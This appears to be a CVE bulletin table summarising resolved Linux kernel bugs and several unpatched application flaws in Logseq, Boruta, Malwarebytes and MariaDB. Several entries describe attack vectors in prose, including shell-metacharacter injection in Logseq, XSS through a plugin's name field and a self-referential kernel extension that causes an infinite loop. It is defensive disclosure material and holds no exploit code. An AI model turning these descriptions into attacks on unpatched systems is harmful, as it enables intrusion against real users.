| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iio: frequency: admv1013: fix NULL pointer dereference on str When device_property_read_string() fails, str is left uninitialized but the code falls through to strcmp(str, ...), dereferencing a garbage pointer. Replace manual read/strcmp with device_property_match_property_string() and consolidate the SE mode enums into a single sequential enum, mapping to hardware register values via a switch consistent with other bitfields in the driver. Several cleanup patches have been applied to this driver recently so this will need a manual backport. | 2026-06-08 | not yet calculated | CVE-2026-46282 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tpm: Use kfree_sensitive() to free auth session in tpm_dev_release() tpm_dev_release() uses plain kfree() to free chip->auth, which contains sensitive cryptographic material including HMAC session keys, nonces, and passphrase data (struct tpm2_auth). Every other code path that frees this structure uses kfree_sensitive() to zero the memory before releasing it: both tpm2_end_auth_session() and tpm_buf_check_hmac_response() do so. The tpm_dev_release() path is the only one that does not, leaving key material in freed slab memory until it is eventually overwritten. Use kfree_sensitive() for consistency with the rest of the driver and to ensure session keys are scrubbed during device teardown. | 2026-06-08 | not yet calculated | CVE-2026-46283 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/hugetlb: fix early boot crash on parameters without '=' separator If hugepages, hugepagesz, or default_hugepagesz are specified on the kernel command line without the '=' separator, early parameter parsing passes NULL to hugetlb_add_param(), which dereferences it in strlen() and can crash the system during early boot. Reject NULL values in hugetlb_add_param() and return -EINVAL instead. | 2026-06-08 | not yet calculated | CVE-2026-46284 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mtd: docg3: fix use-after-free in docg3_release() In docg3_release(), the docg3 pointer is obtained from cascade->floors[0]->priv before the loop that calls doc_release_device() on each floor. doc_release_device() frees the docg3 struct via kfree(docg3) at line 1881. After the loop, docg3->cascade->bch dereferences the already-freed pointer. Fix this by accessing cascade->bch directly, which is equivalent since docg3->cascade points back to the same cascade struct, and is already available as a local variable. This also removes the now-unused docg3 local variable. | 2026-06-08 | not yet calculated | CVE-2026-46285 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: leds: qcom-lpg: Check for array overflow when selecting the high resolution When selecting the high resolution values from the array, FIELD_GET() is used to pull from a 3 bit register, yet the array being indexed has only 5 values in it. Odds are the hardware is sane, but just to be safe, properly check before just overflowing and reading random data and then setting up chip values based on that. | 2026-06-08 | not yet calculated | CVE-2026-46286 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: txgbe: fix RTNL assertion warning when remove module For the copper NIC with external PHY, the driver called phylink_connect_phy() during probe and phylink_disconnect_phy() during remove. It caused an RTNL assertion warning in phylink_disconnect_phy() upon module remove. To fix this, add rtnl_lock() and rtnl_unlock() around the phylink_disconnect_phy() in remove function. ------------[ cut here ]------------ RTNL: assertion failed at drivers/net/phy/phylink.c (2351) WARNING: drivers/net/phy/phylink.c:2351 at phylink_disconnect_phy+0xd8/0xf0 [phylink], CPU#0: rmmod/4464 Modules linked in: ... CPU: 0 UID: 0 PID: 4464 Comm: rmmod Kdump: loaded Not tainted 7.0.0-rc4+ Hardware name: Micro-Star International Co., Ltd. MS-7E16/X670E GAMING PLUS WIFI (MS-7E16), BIOS 1.90 12/31/2024 RIP: 0010:phylink_disconnect_phy+0xe4/0xf0 [phylink] Code: 5b 41 5c 41 5d 41 5e 41 5f 5d 31 c0 31 d2 31 f6 31 ff e9 3a 38 8f e7 48 8d 3d 48 87 e2 ff ba 2f 09 00 00 48 c7 c6 c1 22 24 c0 <67> 48 0f b9 3a e9 34 ff ff ff 66 90 90 90 90 90 90 90 90 90 90 90 RSP: 0018:ffffce7288363ac0 EFLAGS: 00010246 RAX: 0000000000000000 RBX: ffff89654b2a1a00 RCX: 0000000000000000 RDX: 000000000000092f RSI: ffffffffc02422c1 RDI: ffffffffc0239020 RBP: ffffce7288363ae8 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000000 R12: ffff8964c4022000 R13: ffff89654fce3028 R14: ffff89654ebb4000 R15: ffffffffc0226348 FS: 0000795e80d93780(0000) GS:ffff896c52857000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00005b528b592000 CR3: 0000000170d0f000 CR4: 0000000000f50ef0 PKRU: 55555554 Call Trace: <TASK> txgbe_remove_phy+0xbb/0xd0 [txgbe] txgbe_remove+0x4c/0xb0 [txgbe] pci_device_remove+0x41/0xb0 device_remove+0x43/0x80 device_release_driver_internal+0x206/0x270 driver_detach+0x4a/0xa0 bus_remove_driver+0x83/0x120 driver_unregister+0x2f/0x60 pci_unregister_driver+0x40/0x90 txgbe_driver_exit+0x10/0x850 [txgbe] __do_sys_delete_module.isra.0+0x1c3/0x2f0 __x64_sys_delete_module+0x12/0x20 x64_sys_call+0x20c3/0x2390 do_syscall_64+0x11c/0x1500 ? srso_alias_return_thunk+0x5/0xfbef5 ? do_syscall_64+0x15a/0x1500 ? srso_alias_return_thunk+0x5/0xfbef5 ? do_fault+0x312/0x580 ? srso_alias_return_thunk+0x5/0xfbef5 ? __handle_mm_fault+0x9d5/0x1040 ? srso_alias_return_thunk+0x5/0xfbef5 ? count_memcg_events+0x101/0x1d0 ? srso_alias_return_thunk+0x5/0xfbef5 ? handle_mm_fault+0x1e8/0x2f0 ? srso_alias_return_thunk+0x5/0xfbef5 ? do_user_addr_fault+0x2f8/0x820 ? srso_alias_return_thunk+0x5/0xfbef5 ? irqentry_exit+0xb2/0x600 ? srso_alias_return_thunk+0x5/0xfbef5 ? exc_page_fault+0x92/0x1c0 entry_SYSCALL_64_after_hwframe+0x76/0x7e | 2026-06-08 | not yet calculated | CVE-2026-46287 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86/efi: Fix graceful fault handling after FPU softirq changes Since commit d02198550423 ("x86/fpu: Improve crypto performance by making kernel-mode FPU reliably usable in softirqs"), kernel_fpu_begin() calls fpregs_lock() which uses local_bh_disable() instead of the previous preempt_disable(). This sets SOFTIRQ_OFFSET in preempt_count during the entire EFI runtime service call, causing in_interrupt() to return true in normal task context. The graceful page fault handler efi_crash_gracefully_on_page_fault() uses in_interrupt() to bail out for faults in real interrupt context. With SOFTIRQ_OFFSET now set, the handler always bails out, leaving EFI firmware page faults unhandled. This escalates to die() which also sees in_interrupt() as true and calls panic("Fatal exception in interrupt"), resulting in a hard system freeze. On systems with buggy firmware that triggers page faults during EFI runtime calls (e.g., accessing unmapped memory in GetTime()), this causes an unrecoverable hang instead of the expected graceful EFI_ABORTED recovery. Fix by replacing in_interrupt() with !in_task(). This preserves the original intent of bailing for interrupts or NMI faults, while no longer falsely triggering from the FPU code path's local_bh_disable(). [ardb: Sashiko spotted that using 'in_hardirq() || in_nmi()' leaves a window where a softirq may be taken before fpregs_lock() is called, but after efi_rts_work.efi_rts_id has been assigned, and any page faults occurring in that window will then be misidentified as having been caused by the firmware. Instead, use !in_task(), which incorporates in_serving_softirq(). ] | 2026-06-08 | not yet calculated | CVE-2026-46290 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: caam - guard HMAC key hex dumps in hash_digest_key Use print_hex_dump_devel() for dumping sensitive HMAC key bytes in hash_digest_key() to avoid leaking secrets at runtime when CONFIG_DYNAMIC_DEBUG is enabled. | 2026-06-08 | not yet calculated | CVE-2026-46291 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pmdomain: core: Fix detach procedure for virtual devices in genpd If a device is attached to a PM domain through genpd_dev_pm_attach_by_id(), genpd calls pm_runtime_enable() for the corresponding virtual device that it registers. While this avoids boilerplate code in drivers, there is no corresponding call to pm_runtime_disable() in genpd_dev_pm_detach(). This means these virtual devices are typically detached from its genpd, while runtime PM remains enabled for them, which is not how things are designed to work. In worst cases it may lead to critical errors, like a NULL pointer dereference bug in genpd_runtime_suspend(), which was recently reported. For another case, we may end up keeping an unnecessary vote for a performance state for the device. To fix these problems, let's add this missing call to pm_runtime_disable() in genpd_dev_pm_detach(). | 2026-06-08 | not yet calculated | CVE-2026-46292 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: clk: microchip: mpfs-ccc: fix out of bounds access during output registration UBSAN reported an out of bounds access during registration of the last two outputs. This out of bounds access occurs because space is only allocated in the hws array for two PLLs and the four output dividers that each has, but the defined IDs contain two DLLS and their two outputs each, which are not supported by the driver. The ID order is PLLs -> DLLs -> PLL outputs -> DLL outputs. Decrement the PLL output IDs by two while adding them to the array to avoid the problem. | 2026-06-08 | not yet calculated | CVE-2026-46293 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm: fix a buffer overflow in ioctl processing Tony Asleson (using Claude) found a buffer overflow in dm-ioctl in the function retrieve_status: 1. The code in retrieve_status checks that the output string fits into the output buffer and writes the output string there 2. Then, the code aligns the "outptr" variable to the next 8-byte boundary: outptr = align_ptr(outptr); 3. The alignment doesn't check overflow, so outptr could point past the buffer end 4. The "for" loop is iterated again, it executes: remaining = len - (outptr - outbuf); 5. If "outptr" points past "outbuf + len", the arithmetics wraps around and the variable "remaining" contains unusually high number 6. With "remaining" being high, the code writes more data past the end of the buffer Luckily, this bug has no security implications because: 1. Only root can issue device mapper ioctls 2. The commonly used libraries that communicate with device mapper (libdevmapper and devicemapper-rs) use buffer size that is aligned to 8 bytes - thus, "outptr = align_ptr(outptr)" can't overshoot the input buffer and the bug can't happen accidentally | 2026-06-08 | not yet calculated | CVE-2026-46294 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: x86: Do IRR scan in __kvm_apic_update_irr even if PIR is empty Fall back to apic_find_highest_vector() when PID.ON is set but PIR turns out to be empty, to correctly report the highest pending interrupt from the existing IRR. In a nested VM stress test, the following WARNING fires in vmx_check_nested_events() when kvm_cpu_has_interrupt() reports a pending interrupt but the subsequent kvm_apic_has_interrupt() (which invokes vmx_sync_pir_to_irr() again) returns -1: WARNING: CPU: 99 PID: 57767 at arch/x86/kvm/vmx/nested.c:4449 vmx_check_nested_events+0x6bf/0x6e0 [kvm_intel] Call Trace: kvm_check_and_inject_events vcpu_enter_guest.constprop.0 vcpu_run kvm_arch_vcpu_ioctl_run kvm_vcpu_ioctl __x64_sys_ioctl do_syscall_64 entry_SYSCALL_64_after_hwframe The root cause is a race between vmx_sync_pir_to_irr() on the target vCPU and __vmx_deliver_posted_interrupt() on a sender vCPU. The sender performs two individually-atomic operations that are not a single transaction: 1. pi_test_and_set_pir(vector) -- sets the PIR bit 2. pi_test_and_set_on() -- sets PID.ON The following interleaving triggers the bug: Sender vCPU (IPI): Target vCPU (1st sync_pir_to_irr): B1: set PIR[vector] A1: pi_clear_on() A2: pi_harvest_pir() -> sees B1 bit A3: xchg() -> consumes bit, PIR=0 (1st sync returns correct max_irr) B2: set PID.ON = 1 Target vCPU (2nd sync_pir_to_irr): C1: pi_test_on() -> TRUE (from B2) C2: pi_clear_on() -> ON=0 C3: pi_harvest_pir() -> PIR empty C4: *max_irr = -1, early return IRR NOT SCANNED The interrupt is not lost (it resides in the IRR from the first sync and is recovered on the next vcpu_enter_guest() iteration), but the incorrect max_irr causes a spurious WARNING and a wasted L2 VM-Enter/VM-Exit cycle. | 2026-06-08 | not yet calculated | CVE-2026-46295 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: s3c64xx: fix NULL-deref on driver unbind A change moving DMA channel allocation from probe() back to s3c64xx_spi_prepare_transfer() failed to remove the corresponding deallocation from remove(). Drop the bogus DMA channel release from remove() to avoid triggering a NULL-pointer dereference on driver unbind. This issue was flagged by Sashiko when reviewing a controller deregistration fix. | 2026-06-08 | not yet calculated | CVE-2026-46296 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: libwx: use request_irq for VF misc interrupt Currently, request_threaded_irq() is used with a primary handler but a NULL threaded handler, while also setting the IRQF_ONESHOT flag. This specific combination triggers a WARNING since the commit aef30c8d569c ("genirq: Warn about using IRQF_ONESHOT without a threaded handler"). WARNING: kernel/irq/manage.c:1502 at __setup_irq+0x4fa/0x760 Fix the issue by switching to request_irq(), which is the appropriate interface or a non-threaded interrupt handler, and removing the unnecessary IRQF_ONESHOT flag. | 2026-06-08 | not yet calculated | CVE-2026-46297 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pseries/papr-hvpipe: Fix race with interrupt handler While executing ->ioctl handler or ->release handler, if an interrupt fires on the same cpu, then we can enter into a deadlock. This patch fixes both these handlers to take spin_lock_irq{save|restore} versions of the lock to prevent this deadlock. | 2026-06-08 | not yet calculated | CVE-2026-46298 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: topcliff-pch: fix use-after-free on unbind Give the driver a chance to flush its queue before releasing the DMA buffers on driver unbind | 2026-06-08 | not yet calculated | CVE-2026-46301 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: selinux: allow multiple opens of /sys/fs/selinux/policy Currently there can only be a single open of /sys/fs/selinux/policy at any time. This allows any process to block any other process from reading the kernel policy. The original motivation seems to have been a mix of preventing an inconsistent view of the policy size and preventing userspace from allocating kernel memory without bound, but this is arguably equally bad. Eliminate the policy_opened flag and shrink the critical section that the policy mutex is held. While we are making changes here, drop a couple of extraneous BUG_ONs. | 2026-06-08 | not yet calculated | CVE-2026-46302 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: staging: rtl8723bs: os_dep: avoid NULL pointer dereference in rtw_cbuf_alloc The return value of kzalloc_flex() is used without ensuring that the allocation succeeded, and the pointer is dereferenced unconditionally. Guard the access to the allocated structure to avoid a potential NULL pointer dereference if the allocation fails. | 2026-06-08 | not yet calculated | CVE-2026-46305 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pmdomain: mediatek: fix use-after-free in scpsys_get_bus_protection_legacy() In scpsys_get_bus_protection_legacy(), of_find_node_with_property() returns a device node with its reference count incremented. The function then calls of_node_put(node) before checking whether syscon_regmap_lookup_by_phandle() returns an error. If an error occurs, dev_err_probe() dereferences the node pointer to print diagnostic information, but the node memory may have already been freed due to the earlier of_node_put(), leading to a use-after-free vulnerability. Fix this by moving the of_node_put() call after the error check, ensuring the node is still valid when accessed in the error path. | 2026-06-08 | not yet calculated | CVE-2026-46308 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/xe/uapi: Reject coh_none PAT index for CPU cached memory in madvise Add validation in xe_vm_madvise_ioctl() to reject PAT indices with XE_COH_NONE coherency mode when applied to CPU cached memory. Using coh_none with CPU cached buffers is a security issue. When the kernel clears pages before reallocation, the clear operation stays in CPU cache (dirty). GPU with coh_none can bypass CPU caches and read stale sensitive data directly from DRAM, potentially leaking data from previously freed pages of other processes. This aligns with the existing validation in vm_bind path (xe_vm_bind_ioctl_validate_bo). v2(Matthew brost) - Add fixes - Move one debug print to better place v3(Matthew Auld) - Should be drm/xe/uapi - More Cc v4(Shuicheng Lin) - Fix kmem leak issues by the way v5 - Remove kmem leak because it has been merged by another patch v6 - Remove the fix which is not related to current fix v7 - No change v8 - Rebase v9 - Limit the restrictions to iGPU v10 - No change (cherry picked from commit 016ccdb674b8c899940b3944952c96a6a490d10a) | 2026-06-08 | not yet calculated | CVE-2026-46309 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: renesas: vsp1: Fix NULL pointer deref on module unload When unloading the module on gen 4, we hit a NULL pointer dereference. This is caused by the cleanup code calling vsp1_drm_cleanup() where it should be calling vsp1_vspx_cleanup(). Fix this by checking the IP version and calling the drm or vspx function accordingly, the same way as the init code does. | 2026-06-08 | not yet calculated | CVE-2026-46310 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: videobuf2: Set vma_flags in vb2_dma_sg_mmap vb2_dma_contig sets VMA flags VM_DONTEXPAND and VM_DONTDUMP and I do not see a reason why vb2_dma_sg should behave differently. This avoids hitting `WARN_ON(!(vma->vm_flags & VM_DONTEXPAND));` in drm_gem_mmap_obj() during mmap() of an imported dma-buf from the out of tree Apple ISP camera capture driver which uses vb2_dma_sg_memops. gst-launch-1.0 v4l2src ! gtk4paintablesink [ 38.201528] ------------[ cut here ]------------ [ 38.202135] WARNING: CPU: 7 PID: 2362 at drivers/gpu/drm/drm_gem.c:1144 drm_gem_mmap_obj+0x1f8/0x210 [ 38.203278] Modules linked in: rfcomm snd_seq_dummy snd_hrtimer snd_seq snd_seq_device uinput nf_conntrack_netbios_ns nf_conntrack_broadcast nft_fib_inet nft_fib_ipv4 nft_fib_ipv6 nft_fib nft_reject_inet nf_reject_ipv6 nft_reject nft_ct nft_chain_nat nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 nf_tables qrtr bnep nls_ascii i2c_dev loop fuse dm_multipath nfnetlink brcmfmac_wcc hid_magicmouse hci_bcm4377 brcmfmac brcmutil bluetooth ecdh_generic cfg80211 ecc btrfs xor xor_neon rfkill hid_apple raid6_pq joydev aop_als apple_nvmem_spmi industrialio snd_soc_aop apple_z2 snd_soc_cs42l84 tps6598x snd_soc_tas2764 macsmc_reboot spi_nor macsmc_hwmon rtc_macsmc gpio_macsmc macsmc_power regmap_spmi macsmc_input dockchannel_hid panel_summit appledrm nvme_apple dwc3 snd_soc_macaudio drm_client_lib nvme_core phy_apple_atc hwmon apple_sart apple_dockchannel macsmc apple_rtkit_helper spmi_apple_controller aop apple_wdt mfd_core nvmem_apple_efuses pinctrl_apple_gpio apple_isp apple_dcp videobuf2_dma_sg mux_core spi_apple [ 38.203300] videobuf2_memops i2c_pasemi_platform snd_soc_apple_mca videobuf2_v4l2 videodev clk_apple_nco videobuf2_common snd_pcm_dmaengine adpdrm asahi apple_admac adpdrm_mipi drm_dma_helper pwm_apple i2c_pasemi_core drm_display_helper mc cec apple_dart ofpart apple_soc_cpufreq leds_pwm phram [ 38.217677] CPU: 7 UID: 1000 PID: 2362 Comm: gst-launch-1.0 Tainted: G W 6.17.6+ #asahi-dev PREEMPT(full) [ 38.219040] Tainted: [W]=WARN [ 38.219398] Hardware name: Apple MacBook Pro (13-inch, M2, 2022) (DT) [ 38.220213] pstate: 21400005 (nzCv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--) [ 38.221088] pc : drm_gem_mmap_obj+0x1f8/0x210 [ 38.221643] lr : drm_gem_mmap_obj+0x78/0x210 [ 38.222178] sp : ffffc0008dc678e0 [ 38.222579] x29: ffffc0008dc678e0 x28: 0000000000042a97 x27: ffff8000b701b480 [ 38.223465] x26: 00000000000000fb x25: ffffc0008dc67d20 x24: ffffc0008dc67968 [ 38.224402] x23: ffff8000e3ca5600 x22: ffff8000265b7800 x21: ffff80003000c0c0 [ 38.225279] x20: 0000000000000000 x19: ffff8000b68c5200 x18: ffffc0008dc67968 [ 38.226151] x17: 0000000000000000 x16: 0000000000000000 x15: ffffc000810a30a8 [ 38.227042] x14: 00007fff637effff x13: 00005555de91ffff x12: 00007fff63293fff [ 38.227942] x11: 0000000000000000 x10: ffff8000184ecf08 x9 : ffffc0007a1900c8 [ 38.228824] x8 : ffffc0008dc67968 x7 : 0000000000000012 x6 : ffffc0015cf1c000 [ 38.229703] x5 : ffffc0008dc676a0 x4 : ffffc00081a27dc0 x3 : 0000000000000038 [ 38.230607] x2 : 0000000000000003 x1 : 0000000000000003 x0 : 00000000100000fb [ 38.231488] Call trace: [ 38.231806] drm_gem_mmap_obj+0x1f8/0x210 (P) [ 38.232342] drm_gem_mmap+0x140/0x260 [ 38.232813] __mmap_region+0x488/0x9a0 [ 38.233277] mmap_region+0xd0/0x148 [ 38.233703] do_mmap+0x350/0x5c0 [ 38.234148] vm_mmap_pgoff+0x14c/0x200 [ 38.234612] ksys_mmap_pgoff+0x150/0x208 [ 38.235107] __arm64_sys_mmap+0x34/0x50 [ 38.235611] invoke_syscall+0x50/0x120 [ 38.236075] el0_svc_common.constprop.0+0x48/0xf0 [ 38.236680] do_el0_svc+0x24/0x38 [ 38.237113] el0_svc+0x38/0x168 [ 38.237507] el0t_64_sync_handler+0xa0/0xe8 [ 38.238034] el0t_64_sync+0x198/0x1a0 [ 38.238491] ---[ end trace 0000000000000000 ]--- There were discussions in [1] at the end of 2023 that mmap() on imported ---truncated--- | 2026-06-08 | not yet calculated | CVE-2026-46312 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: intel/ipu6: fix error pointer dereference In a error path isp->psys is confirmed to be an error pointer not NULL so this condition is true and the error pointer is dereferenced. So isp-psys should be set to NULL before going to out_ipu6_bus_del_devices. Detected by Smatch: drivers/media/pci/intel/ipu6/ipu6.c:690 ipu6_pci_probe() error: 'isp->psys' dereferencing possible ERR_PTR() [Sakari Ailus: Fix commit message.] | 2026-06-08 | not yet calculated | CVE-2026-46313 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/v3d: Reject empty multisync extension to prevent infinite loop v3d_get_extensions() walks a userspace-provided singly-linked list of ioctl extensions without any bound on the chain length. A local user can craft a self-referential extension (ext->next == &ext) with zero in_sync_count and out_sync_count, which bypasses the existing duplicate- extension guard: if (se->in_sync_count || se->out_sync_count) return -EINVAL; The guard never fires because v3d_get_multisync_post_deps() returns immediately when count is zero, leaving both fields at zero on every iteration. The result is an infinite loop in kernel context, blocking the calling thread and pegging a CPU core indefinitely. Fix this by rejecting a multisync extension where both in_sync_count and out_sync_count are zero in v3d_get_multisync_submit_deps(). An empty multisync carries no synchronization information and serves no useful purpose, so returning -EINVAL for such an extension is the correct defense against this attack vector. | 2026-06-08 | not yet calculated | CVE-2026-46314 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring/waitid: clear waitid info before copying it to userspace IORING_OP_WAITID stores its result fields in struct io_waitid::info and later copies them to userspace siginfo. The prep path initializes the request arguments, but it does not initialize info itself. If the wait operation completes without reporting a child event, the common wait code can return without writing wo_info. In that case io_waitid_finish() still copies iw->info to userspace, exposing stale bytes from the reused io_kiocb command storage. Clear the result storage during prep so the io_uring path matches the regular waitid syscall, which uses a zero-initialized struct waitid_info. | 2026-06-09 | not yet calculated | CVE-2026-46315 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Revert "mm/hugetlbfs: update hugetlbfs to use mmap_prepare" This reverts commit ea52cb24cd3f ("mm/hugetlbfs: update hugetlbfs to use mmap_prepare") with conflict resolution to account for changes in commit ea52cb24cd3f ("mm/hugetlbfs: update hugetlbfs to use mmap_prepare"). The patch incorrectly handled hugetlb VMA lock allocation at the mmap_prepare stage, where a failed allocation occurring after mmap_prepare is called might result in the lock leaking. There is no risk of a merge causing a similar issues, as VMA_DONTEXPAND_BIT is set for hugetlb mappings. As a first step in addressing this issue, simply revert the change so we can rework how we do this having corrected the underlying issues. We maintain the VMA flags changes as best we can, accounting for the fact that we were working with a VMA descriptor previously and propagating like-for-like changes for this. Note that we invoke vma_set_flags() and do not call vma_start_write() as vm_flags_set() does. This is OK as it's being done in an .mmap hook where the VMA is not yet linked into the tree so nobody else can be accessing it. | 2026-06-09 | not yet calculated | CVE-2026-46318 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: erofs: handle end of filesystem properly for file-backed mounts I/O requests beyond the end of the filesystem should be zeroed out, similar to loopback devices and that is what we expect. | 2026-06-09 | not yet calculated | CVE-2026-46329 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/nouveau: fix nvkm_device leak on aperture removal failure When aperture_remove_conflicting_pci_devices() fails during probe, the error path returns directly without unwinding the nvkm_device that was just allocated by nvkm_device_pci_new(). This leaks both the device wrapper and the pci_enable_device() reference taken inside it. Jump to the existing fail_nvkm label so nvkm_device_del() runs and balances both. The leak was introduced when the intermediate nvkm_device_del() between detection and aperture removal was dropped in favor of creating the pci device once. | 2026-06-09 | not yet calculated | CVE-2026-52904 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/damon/core: disallow non-power of two min_region_sz on damon_start() Commit d8f867fa0825 ("mm/damon: add damon_ctx->min_sz_region") introduced a bug that allows unaligned DAMON region address ranges. Commit c80f46ac228b ("mm/damon/core: disallow non-power of two min_region_sz") fixed it, but only for damon_commit_ctx() use case. Still, DAMON sysfs interface can emit non-power of two min_region_sz via damon_start(). Fix the path by adding the is_power_of_2() check on damon_start(). The issue was discovered by sashiko [1]. | 2026-06-09 | not yet calculated | CVE-2026-52905 |
| logseq--logseq | The Electron preload script in Logseq exposes an API method that allows the renderer process to invoke IPC handlers without proper path validation. An attacker with JavaScript execution in the renderer (e.g. via XSS or a malicious plugin), can read, write, or delete arbitrary files on the user's system. While only version v0.10.15 was tested and confirmed as vulnerable, status of other versions is unknown since this issue was not addressed by a patch. | 2026-06-09 | not yet calculated | CVE-2026-47899 |
| logseq--logseq | Logseq is vulnerable to a stored cross-site scripting (XSS). A malicious plugin can include a JavaScript payload in the "name" field of its "package.json" file, which is rendered using "innerHTML" without proper sanitization, allowing the execution of arbitrary code in the privileged host context. While only version v0.10.15 was tested and confirmed as vulnerable, status of other versions is unknown since this issue was not addressed by a patch. | 2026-06-09 | not yet calculated | CVE-2026-47900 |
| logseq--logseq | Logseq is vulnerable to a sandbox escape flaw where plugins running in sandboxed iframes can inject arbitrary HTML attributes, such as event handlers, into their container element in the host DOM. Due to a disabled Content Security Policy (CSP), this allows a malicious plugin to execute arbitrary JavaScript in the privileged host context, potentially gaining unauthorized access to filesystem APIs. While only version v0.10.15 was tested and confirmed as vulnerable, status of other versions is unknown since this issue was not addressed by a patch. | 2026-06-09 | not yet calculated | CVE-2026-47901 |
| logseq--logseq | Logseq exposes an IPC handler that allows the renderer process to execute shell commands. While an allowlist restricts the command name (e.g. `git`, `pandoc`, `grep`), the argument string is concatenated with the command and passed to `child_process.spawn` with the `shell: true` option, allowing shell metacharacters in the arguments to bypass the allowlist. An attacker with JavaScript execution in the renderer (e.g. via XSS or a malicious plugin) can execute arbitrary shell commands with the privileges of the Logseq process, leading to remote code execution on the host. While only version v0.10.15 was tested and confirmed as vulnerable, status of other versions is unknown since this issue was not addressed by a patch. | 2026-06-09 | not yet calculated | CVE-2026-9279 |
| malach-it--boruta-server | Boruta is a standalone authorization server that aims to implement OAuth 2.0 and Openid Connect up to decentralized identity specifications. Prior to version 0.9.1, boruta session cookies and the identity "remember me" cookie were set without the Secure attribute. In deployments where users could reach the same Boruta origin over plaintext HTTP, browsers could send these cookies over an unencrypted connection. An attacker able to observe or intercept that network traffic could recover a valid session or remember-me cookie and reuse it to impersonate the affected user. Affected components include boruta_web, boruta_identity, and boruta_admin. The affected cookies include the shared session cookie, defaulting to _boruta_web_key, and the identity remember-me cookie, defaulting to `_boruta_identity_web_user_remember_me`. The issue is fixed in commit 18691c655164635066aa113003a3cd87f6ed11cd, released as part of version 0.9.1. The patch sets `secure: true` and `same_site: "Lax"` on configured session cookies for boruta_web, boruta_identity, and boruta_admin, and sets `secure: true` on the identity remember-me cookie. Until upgrading to a release containing the fix: terminate or reject plaintext HTTP before requests reach Boruta; enforce HTTPS-only access at the reverse proxy or load balancer; enable HSTS for Boruta domains; if cookie exposure is suspected, rotate SECRET_KEY_BASE and BORUTA_SESSION_COOKIE_SIGNING_SALT, then require users to authenticate again. Upgrade to a version containing commit 18691c655164635066aa113003a3cd87f6ed11cd, or apply the patch manually. After deploying the fix, verify that Boruta session and remember-me cookies include the Secure attribute in browser developer tools or with an HTTP response inspection tool. | 2026-06-11 | not yet calculated | CVE-2026-53661 |
| Malwarebytes--EDR 1.0.11 | The utility functions used by Malwarebytes EDR 1.0.11 on Linux for calculating a cryptographic hash of data bytes truncate the hashed data if it exceeds 4GB. This leads to an integer wrap-around if the data is larger than the maximum unsigned integer value (32-bit). Attackers could create a colliding hash value for two different strings by attaching 4GB of data to a string that is less than 4GB in size. | 2026-06-09 | not yet calculated | CVE-2023-29146 |
| Malwarebytes--Malwarebytes | An issue was discovered in Malwarebytes 4.x and 5.x (and Nebula 2020-10-21 and later). A large number of Firefox preference files can cause the parser to ignore other browser configuration files, leading to a denial of service. | 2026-06-09 | not yet calculated | CVE-2023-43686 |
| Malwarebytes--Malwarebytes | An issue was discovered in Malwarebytes 4.x and 5.x (and Nebula 2020-10-21 and later). There is a Heap buffer overflow in various buffer encryption utilities. | 2026-06-09 | not yet calculated | CVE-2023-43688 |
| MariaDB--server | MariaDB server is a community developed fork of MySQL server. From versions 10.6.1 to before 10.6.26, 10.11.1 to before 10.11.17, 11.4.1 to before 11.4.11, 11.8.1 to before 11.8.7, and 12.3.1, MariaDB on WIndows with installed CONNECT engine and enabled REST support interpolated table HTTP attribute into the curl command line without proper sanitizing. This allows the user to execute shell commands on the server. This issue has been patched in versions 10.6.26, 10.11.17, 11.4.11, 11.8.7, and 12.3.2. | 2026-06-12 | not yet calculated | CVE-2026-44170 |
| MariaDB--server | MariaDB server is a community developed fork of MySQL server. In versions 3.3.18 and 3.4.8, an application that was taking non-validated user input, escaping it with mysql_real_escape_string() and sending it to the database using text protocol and big5 character set was vulnerable to SQL injections, even though mysql_real_escape_string() was supposed to prevent them. This issue has been patched in versions 3.3.19 and 3.4.9. | 2026-06-12 | not yet calculated | CVE-2026-44172 |
